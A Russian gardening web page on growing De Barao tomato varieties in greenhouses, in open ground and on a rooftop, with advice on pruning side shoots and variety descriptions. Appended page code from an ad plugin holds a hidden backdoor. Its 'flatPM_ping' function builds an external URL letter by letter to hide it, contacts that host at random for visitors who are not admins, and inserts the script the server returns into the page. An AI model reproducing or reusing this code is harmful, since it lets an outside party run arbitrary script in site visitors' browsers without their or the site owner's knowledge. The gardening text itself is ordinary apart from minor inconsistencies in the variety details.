6 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Выращивание томатов де барао разных видов

Выращивание томатов де барао разных видов

Решила остаток жизни провести в деревне. Журнал «ПХ» для меня как справочник, но есть претензии: мало даете материалов, в которых прослеживалась бы технология выращивания того или иного овощного растения, от посева до уборки. Конкретно меня в этой связи интересуют высокорослые помидоры в открытом грунте. Думаю, что и для других овощеводов такой материал будет небезынтересен. Для контраста дополните рассказ сведениями о выращивании карликовых помидоров, вроде сорта Москвич.
Из письма Р. Блудовой (Харьковская обл.)

В ОТКРЫТОМ ГРУНТЕ

Помидоры Де-Барао у меня вызревают в открытом грунте. Сею своими семенами 6 лет. Сорт этот высокорослый, позднеспелый, высота куста до 3 м. Плоды овальные, красные, приятные на вкус, хороши в засолке и маринаде. Урожай с куста — до 25 кг.

Семена Де-Барао высеваю на рассаду во второй половине февраля. Для этого пользуюсь бумажным горшочком диаметром 15 см и высотой 12 см. Такой горшочек легко сделать из молочного пакета.

Глубина заделки — не более 6—8 мм. Если сею в ящике, то расстояние между рядками выбираю таким, чтобы при пересадке рассады не нарушалась корневая система саженца. Обычно промежуток между рядами выбираю 5 см, а между растениями — 3 см.

Перед высевом семена выдерживаю 2 ч в растворе соды (1 чайная ложка соды на 1 л воды). Всплывшие семена не годятся для посева, остальные подсушиваю и пускаю в дело как посевной материал.
Засеянные ящики закрываю пленкой на 5—6 дней.

В период роста рассаду обязательно закаливаю, для этого в помещении оставляю на ночь открытым окно.

Во второй половине мая, в теплые дни, рассаду высаживаю в открытый грунт на расстоянии 1,2—1,5 м друг от друга. Сажаю кусты наклонно под углом 30°, ориентируя корнями на юг. Удаляю со стебля все листья, кроме верхних. При посадке обильно поливаю теплой водой, повторный полив провожу через неделю с добавкой органического удобрения (раствор куриного помета 1:20 или коровяка 1:6). Периодически рыхлю почву вокруг куста, не нарушая корней рассады. При заморозках растения накрываю двойной пленкой и деревянным ящиком.

Ставлю колья с таким расчетом, чтобы в дальнейшем их нарастить до высоты 3 м каждый. Сколько кустов, столько и кольев. Как помидоры возьмутся за силу и стебли их достигнут высоты 1,2 м, вокруг каждого куста сколачиваю деревянную опалубку в виде куба со стороной 50 см. Стены опалубки изнутри обтягиваю пленкой. Можно поставить бак без дна.
Опалубку или бак заполняю компостом до половины. Состав компоста: перегной, дерн, торф, песок, зола. Каждую неделю куст поливаю теплым раствором органического удобрения, как внутри опалубки, так и снаружи. Постепенно заполняю опалубку компостом почти полностью.

Во время роста плодов норму полива увеличиваю до 8 л на куст. Пасынки не обрываю. Но в период быстрого роста куста внимательно слежу за подвязкой ветвей к поддерживающим кольям. Чтобы ускорить развитие корневой системы и приблизить сроки цветения и созревания плодов, применяю фосфорные удобрения.

По мере поспевания (в кисти завязывается 7—12 плодов) я регулярно снимаю красные и розовые помидоры. Первые спелые крупные плоды оставляю на семена.

Начиная с 1 сентября делаю прищипку и удаляю молодые пасынки. С этого времени надо принимать меры, чтобы предохранить куст от возможных заморозков. Последний срок сбора урожая — начало октября. Собранные помидоры, уложенные в ящики, храню в теплом сухом месте. К зеленым помидорам подкладываю несколько красных — пусть другие краснеют. Свежие помидоры сохраняю в комнатных условиях до января.

А вот низкорослые помидоры сорта Москвич я выращиваю на крыше хозблока. Сорт этот не только карликовый, но и чрезвычайно раннеспелый. Плоды круглые, мелкие, красные. Урожай с куста 1,5—2 кг.

Выращиваю этот сорт в деревянных ящиках (можно использовать старые худые ведра). На дно ящика как дренаж укладываю сухую болотную осоку или солому слоем до 5 см.

Семена на рассаду сею в первых числах мая. Делаю это в помещении. Причем ящик заполняю почвой на 2/3, остальную почву досыпаю постепенно. Высаженную в ящик рассаду закаливаю. Как исчезнет угроза ночных заморозков, растения помещаю на крышу хозблока.

При выращивании помидоров в ящиках и ведрах обычно необходим регулярный и обильный полив. Сорт Москвич в этом отношении менее прихотлив, чем другие, хорошо растет в ящиках и вызревает на кусте. Чтобы предохранить кусты от поломки ветром, ящики (по 3 шт.) укрепляю проволокой, а для улучшения температурных условий ставлю с северной стороны раму, обтянутую пленкой. Излишний раствор, стекающий с крыши при поливе, собираю в специальную емкость и использую повторно.

Карлики на крыше все равно оказываются ниже гигантов, стоящих на земле. Одним словом, на Де-Барао взглянешь, шляпа скатится с головы — так высоки.

Янин Иван Иванович, овощевод-любитель
Москва

Формируем помидорный куст.

Недостаточно вырастить хорошую рассаду помидоров и правильно ухаживать за растением, важно умело сформировать куст. У томатов от главного стебля в пазухах листьев вырастают боковые побеги — пасынки. Одни сорта образуют много, другие мало пасынков, поэтому их и формируют по-разному.
Обычно больше пасынков появляется после цветения.

Если их много, они отнимают у растения питательные вещества и влагу, замедляются рост, цветение и задерживается плодоношение. Поэтому у большинства сортов раз в неделю удаляют пасынки, не давая им вырасти длиннее 4 см. Опаздывать нельзя, иначе образуются большие ранки, через которые могут проникнуть возбудители болезней. Поспешите убрать пасынки под первой плодовой кистью. Выщипывающих пальцами, оттягивая вниз. Делать это лучше утром. После чего сутки не поливают и не подкармливают растения, чтобы не повышалась влажность и ранки скорее зажили. При пасынковании оставляют пенек в 0,5—1 см. Если же пасынок удаляют полностью, то на том же месте может вырасти новый.

В открытом грунте

Среднерослые сорта, а их большинство, формируют в два или три стебля, На главном стебле оставляют один пасынок или два (рис. 3 и 4), причем только те, которые растут из пазух листьев под первой цветочной кистью. Эти два пасынка помимо главного стебля образуют дополнительно еще один-два стебля. Обычно они самые сильные и лишь незначительно отстают в росте от главного стебля. И соцветия на них зацветают быстро. Среднерослые сорта выращивают в один стебель.

Позднеспелые сорта обязательно пасынкуют и формируют в один стебель, иначе плоды не успеют вызреть.

В теплице

Обычно в теплицах выращивают высокорослые сорта и гибриды, а также среднерослые помидоры. Первые формируют только в один стебель, а все пасынки выламывают, лишь только они подрастут до 2—5 см. Это гибриды Гамаюн, Рококо, Портос, Тортила, Торнадо, Стриж, Красная стрела, Барыня, Василиса, а также многие распространенные высокорослые любительские сорта: Де Барао, Японское дерево, Банан оранжевый, Испанский гигант, Малиновый великан, Оранжевое чудо, Голландия, Красные пальчики, Груша оранжевая, Японский трюфель.

В виде исключения, если сорта малооблиственные и посажены редко (через 50— 60 см), их выращивают в два стебля, оставляя нижний пасынок под первой кистью. Оба стебля подвязывают к шпалере.

Среднерослые сорта в тепличке формируют в один или два стебля, подвязывая к шпалере. Это большинство любительских сортов— Олеся, Груша красная, Марглоубе, Банан красный, Фойер Кугель, Золотая королева, Аурига, Монах, Бифштекс. Чтобы они дольше плодоносили, в верхней части стебля оставляют дополнительный резервный пасынок. Если рост стебля продолжается, то пасынок удаляют, оставляя опять резервный верхний пасынок. Когда главный стебель остановится в росте (на верхушке образуется соцветие), то верхний резервный пасынок подвязывают к шпалере, тем самым удлиняя стебель, на котором образуется еще дополнительно 2— 3 кисти плодов (рис. 5). Этот прием подходит для гибридов Верлиока, Благовест, Портланд и многих среднерослых сортов. На стебле образуется не 5—6 кистей, как обычно, а 8—10.

Удаляем листья

При формировании растений у низкорослых сортов удаляют постепенно все листья под первой кистью. В августе обрезают все цветы и мелкие плоды, которые все равно не успеют вызреть.

После того как плоды высокорослых томатов начнут буреть, на первой кисти постепенно удаляют все листья. Так же поступают и с листьями под второй и третьей кистями. Это улучшает воздухообмен, освещение плодов и ускоряет их созревание.

Верхушку высокорослых томатов прищипывают у верхней шпалерной проволоки, оставив после верхней кисти два листа. Если лист лежит на земле или затеняет плод, то такой лист удаляют (целиком или лишь часть его). Тот, кто не ленится пасынковать, правильно формирует растения, всегда с урожаем.
Т. Октябрьская

Характеристика и описание 7 сортов помидор Де Барао

Иногда новички путают название этого сорта и называют его дебарау, но такой сорт, нигде не зарегистрирован и поэтому пока не существует. Сейчас разговор пойдет о чудесном не имеющем недостатков сорте помидор Де Барао, характеристика и описание которого представлена ниже.

Характеристика сорта томата Де Барао

Этот сорт покорил огородников в 90-е годы, и многие его высаживают до сих пор. Имеет много подвидов различных по цвету и форме плодов. Куст индетерминантный, мощный. Можно сказать, что кусты этого сорта дают богатые урожаи стабильно не зависимо от погодных условий. Томаты пригодны для поедания в салатах и консервации. Рассада легко выращивается и с одного куста можно получить до 20 кг. помидоров.

Описание сорта

Ствол крепкий, не хрупкий, на котором расположено много листовых пластин помидорного типа темно-зеленого цвета. На кусте завязывается до 10 шт. кистей, в каждой из которых имеется по 7 плодов выровненных по весу. Сорт позднего созревания. Культивировать сорт можно как в теплице, так и в открытом грунте.

Показатель Описание
Куст Высота 4 м.
Срок созревания 110-120 суток.
Урожайность 20 кг. с одного куста.
Форма плода В зависимости от вида, но в основном продолговатая.
Окрас томата Зависит от вида – розовая, красная, желтая и др.
Средней вес ягоды 90-130 гр.
Кожица Средней упругости.
Мякоть Сочная и нежная.
Транспортировка Отличная.
Хранение До двух месяцев после снятия с куста.

Преимущества и недостатки

У этого сорта просто нет никаких недостатков, томат обладает только положительными качествами:

  • Не требователен в уходе;
  • Может выращиваться в полутени;
  • Морозостойкий;
  • Обладает высокой урожайностью;
  • Обладает хорошей устойчивостью к заболеваниям томатного типа;
  • Обладает длительным сроком хранения.

Виды – чем они отличаются

Де Барао это общее название сорта, но нашими селекционерами выведено много видов этих помидор, которые отличаются по:

  • Форме плодов;
  • Цвету плодов;
  • Пищевкусовым качествам.

Розовый

Для полного вызревания виду необходимо 115 суток от первых всходов. При полной спелости помидоры обладают розовым цветом и красивым товарным видом. Положительные качества – морозостойкость, теневыносливость, дружная отдача урожая, устойчивость к заболеваниям.

Черный

Этот подвид отличается от других только окрасом плодов. Они темного фиолетово-красного цвета массой 50 гр. Плоды Черного гиганта вызревают на 115 сутки. Все положительные качества такие же, как и у других подвидов.

Красный

Подвид сорта дает стабильно большой урожай до 6 кг с куста при правильном выращивании. Плоды весят в среднем 110 гр.

Красный Де Барао

Положительные качества:

  • Хорошо переносит тень;
  • Не болеет;
  • Переносит понижение температуры;
  • Обладает хорошим урожаем товарного вида плодов.

Отрицательные качества:

  • Кусты мощные требующие пасынковании и удаления лишней листовой массы.

Царский

Это урожайный вид Де Барао, так как в среднем с куста собирают 15-20 кг в условиях открытого грунта.

Положительные качества:

  • Длительность и обильность отдачи урожая;
  • Устойчивость к заболеваниям;
  • Долгий срок хранения сорванных плодов;
  • Универсальное применение томатов;
  • Переносит понижение температуры.

Отрицательные качества:

  • Мощный рост требует высокой и прочной опоры;
  • Необходимость пасынкования.

Гигант

Куст вырастет больше 2 м отметки, средний вес томатов этого сорта 150 гр, цвет томатов красный и сливообразная форма.

Золотой

Помидоры обладают замечательными вкусовыми качествами и имеют золотой окрас своих плодов. Срок созревания составляет 115 суток.

Де Барао Золотой

Положительные качества:

  • Хорошо переносить частичный рост в тени;
  • Стабильно большой урожай;
  • Устойчивость к болезням и понижениям температуры.

Отрицательные качества:

  • Большие кусты;
  • Много листовой массы, которую приходится частично удалять.

Оранжевый

Срок созревания составляет в среднем 125 суток. Плоды выровненные по форме оранжевого цвета. Урожайность составляет 12 кг с одного куста. Плодоносит до самых морозов и обладает теми же положительными качествами, которые присущи различным видам Де Барао.

Порядок выращивания помидор в теплице

Это прекрасный вид помидор, который в тепличных условиях может дать максимальный урожай прекрасных томатов.

Подготовка материала для посадки

Семена стоит подготовить к высадке. Первым делом их проверяют на всхожесть. Для этого в стакане воды разводят чайную ложку соли и тщательно размешивают ее в воде. В этот соляной раствор опускают семена и те, что всплыли, не пригодны к дальнейшему проращиванию, так как в них нет жизни. Остальные семена надо обеззаразить и для этого их на полчаса опускают в розовый раствор марганцевого калия. Только после этих процедур приступают к посадке семян.

Проверка семян томата на всхожесть

Когда сажать

Для посева в теплицу семена высевают в подготовленные емкости в конце февраля. Чтобы получить хорошую рассаду на выходе стоит придерживаться определенных правил:

  1. Емкость должна быть высотой около 12 см и иметь дренажные отверстия для слива лишней воды после полива.
  2. Грунт ля выращивания рассады должен быть питательным и рыхлым. Его можно приобрести в специализированном магазине, а можно составить самому, взяв все в равных долях – торф, огородную землю, землю из компостной кучи.
  3. Семена заделываются на глубину 1,5-2 см, после чего накрывают стеклом и ждут всходов 3-6 дней.
  4. Когда большинство всходов будет уже над поверхностью грунта, стекло убирают и выращивают рассаду, поливая и поворачивая ее различными сторонами по отношению к солнцу.

Всходы семян томата
  1. Пикирование рассады делаю, когда на ростках будет по два настоящих листа и переносят их в 500 гр. стаканчики.

Основные требования к уходу

Поливы

Это обязательное условие для культивирования помидор. Их делают еженедельно и теплой водой, чтобы избежать загнивания корневой массы. Поливать лучше вечером, чтобы за ночь растение успело напитаться водой.

Подкормки

Первую подкормку кусту обеспечивают спустя 10 дней после высадки рассады – подкармливают азотными удобрениями. Вторую вносят вовремя образования бутонов, это должна быть фосфорно-калиевая подкормка и желательно в жидком состоянии. Перекармливать помидоры не следует, так как это плохо скажется на качестве томатов.

Когда и как собирают урожай

Плоды Де Барао начинают вызревать спустя 4 месяца после всходов рассады. Плодоношение длительное и прекращается только при понижении температуры до минусовой. Помидоры можно снимать в молочном возрасте, и они дойдут до нормальной спелости при дозаривании.

Выращивание в открытом грунте

Выращивание в открытом грунте мало чем отличается от выращивания в теплице единственное, что урожай будет меньшим, так как его количество будет зависеть от погодных условий. Рассада в грунт будет высажена позже и урожай побьет морозом раньше чем в теплице.

Подготовка материала для посадки

Семена подготавливают по тому же принципу, как и для высадки рассады для условий теплицы.

Когда сажать

Время посадки сдвигается на месяц. В южных регионах России к высадки семян на рассаду приступают в середине марта, Московская область и все регионы, находящиеся на ее широте высевают семена в последних числах марта.

Основные требования к уходу

Требования к уходу абсолютно не отличаются от ухода в теплице. Те же поливы и подкормки. Рыхления и удаление сорной травы производится на второй день после поливов. Единственное что нужная опора для кустов втыкается на стадии высадки рассады. Это делается, чтобы не повредить корни.

Когда и как собирают урожай

Урожай начинают собирать в конце июля начале августа. Все зависит от погодных условий и наличия холодных ночей. Чем их больше, тем меньше созревает помидор.

Замечательное разнообразие томатов этого сорта всегда будет радовать огородника своим результатом. Без урожая не останется даже новичок главное придерживаться рекомендаций по выращиванию этого сорта.

Помидоры Де Барао – описание, как правильно сажать и ухаживать, почему вытянулась рассада?

Мир культурных томатов многообразен. Помидоры Де Барао произвели в далекие 90-е года. Ежегодно селекционеры работают над созданием новых видов, но популярность и актуальность качеств томата, данного сорта остается на самом высоком уровне.

Помидоры Де Барао – описание

Для разведения под пленкой и в открытом грунте идеально подходят помидоры Де Барао. Индетерминантная культура с крепкой корневой системой. Начинает плодоносить на 115-120 день после прорастания семян. Рассаду формируют в один стебель, при выращивании в теплых регионах в два. Томаты Де Барао описание основных достоинств:

  • мощное сильнорослое растение;
  • обильное плодоношение;
  • урожайность 20 кг с куста;
  • продолжительное созревание плодов до заморозков;
  • неприхотливость;
  • используют для всех видов консервирования;
  • не лопаются;
  • не повреждаются во время транспортировки;
  • устойчивы к заболеваниям.

Помидоры Де Барао – характеристика

Растение бразильской селекции пользуется заслуженным вниманием у овощеводов. Сильнорослый куст при достижении двух метров образует 7-10 ветвей с зеленцами. В обязательном порядке он требует выламывания всех пасынков. Плоды весом от 90-150 г, гладкие, сочные с прочной кожицей. Продолговато-овальной формы, изысканного вкуса. Сорт помидор Де Барао имеет восемь вариантов по форме, вкусу и цвету:

  1. Золотой – имеет желто-золотистый оттенок. Время созревания 115 дней. Плодоношение до 7 кг с куста.
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};